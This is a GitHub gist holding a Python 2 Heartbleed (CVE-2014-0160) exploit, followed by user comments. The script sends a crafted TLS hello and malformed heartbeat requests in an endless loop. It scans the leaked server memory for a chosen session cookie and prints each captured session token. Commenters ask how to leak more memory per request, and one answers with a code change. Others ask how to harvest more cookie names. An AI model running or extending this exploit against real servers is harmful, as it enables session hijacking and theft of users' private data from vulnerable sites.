Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import select
import sys
import string
import struct
import socket
import time
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
class HeartBleeder(object):
server_response = None
socket = None
hostname = ''
port = 443
found_sessions = set()
cookie = 'session'
cookie_length = 56
def __init__(self, hostname='', cookie=''):
self.hostname = hostname
self.cookie = cookie
def connect(self):
"""
Connects to the remote server.
"""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
self.socket.connect((self.hostname, self.port))
sys.stdout.flush()
self.socket.send(hello)
sys.stdout.flush()
def rcv_response(self):
while True:
_type, version, payload = self.rcv_message()
if _type is None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if _type == 22 and ord(payload[0]) == 0x0E:
break
def rcv_message(self):
record_header = self.rcv_all(5)
if record_header is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
_type, version, line = struct.unpack('>BHH', record_header)
payload = self.rcv_all(line, 10)
if payload is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return _type, version, payload
def rcv_all(self, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([self.socket], [], [], 5)
if self.socket in r:
data = self.socket.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def try_heartbeat(self):
self.socket.send(hb)
while True:
_type, version, self.payload = self.rcv_message()
if _type is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if _type == 24:
# print 'Received heartbeat response:'
self.parse_response()
if len(self.payload) > 3:
pass
# print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if _type == 21:
print 'Received alert:'
self.hexdump(self.payload)
print 'Server returned error, likely not vulnerable'
return False
def parse_response(self):
"""
Parses the response from the server for a session id.
"""
ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)
index = string.find(ascii, self.cookie)
if index >= 0:
info = ascii[index:index + self.cookie_length]
session = info.split(' ')[0]
session = string.replace(session, ';', '')
if session not in self.found_sessions:
self.found_sessions.add(session)
print session
def hexdump(self, payload):
"""
Prints out a hexdump in the event that server returns an error.
"""
for b in xrange(0, len(payload), 16):
line = [c for c in payload[b:b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in line)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def scan(self):
self.connect()
self.rcv_response()
self.try_heartbeat()
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
cookies_str = 'session'
if len(args) > 1:
cookies_str = args[1]
print cookies_str
while True:
heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)
heartbeat.scan()
if __name__ == '__main__':
main()
@kodergeek

This comment has been minimized.

Copy link

commented Apr 10, 2014

This script returns only 16K of server's memory. How can I modify it so the server returns maximum
of 64k of its memory section?

@chnchapters

This comment has been minimized.

Copy link

commented Apr 10, 2014

change the number to 4098 in line 58

@dinhtq11

This comment has been minimized.

Copy link

commented Apr 12, 2014

When i run file with content above , it is error
C:\Python34>python.exe OPENSSL.py
File "OPENSSL.py", line 79
print 'Server closed connection without sending Server Hello'
^
SyntaxError: invalid syntax

Help me fix it . Thanks all.

@Aad-Jan

This comment has been minimized.

Copy link

commented Apr 15, 2014

Use v2.7. That's all.

@peeyooshkumar09

This comment has been minimized.

Copy link

commented Apr 17, 2014

When I run this in windows C:\Python27>python heartbleed.py [server] gives me following error.

Unexpected EOF receiving record payload - server closed connection
Server closed connection without sending Server Hello. (around 15-20 times)

Traceback (most recent call last):
File "heartbleed.py", line 190, in
main()
File "heartbleed.py", line 186, in main
heartbeat.scan()
File "heartbleed.py", line 168, in scan
self.rcv_response()
File "heartbleed.py", line 77, in rcv_response
_type, version, payload = self.rcv_message()
File "heartbleed.py", line 87, in rcv_message
record_header = self.rcv_all(5)
File "heartbleed.py", line 109, in rcv_all
data = self.socket.recv(remain)
socket.error: [Errno 10054] An existing connection was forcibly closed by the re
mote host

@Mementored

This comment has been minimized.

Copy link

commented Apr 27, 2014

How would you go about adding additional cookie names/values at the end of the parsed data?
Let's say I have a "timestamp" cookie, I can manually check for this using the -c option, but how would you add this to the existing output?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.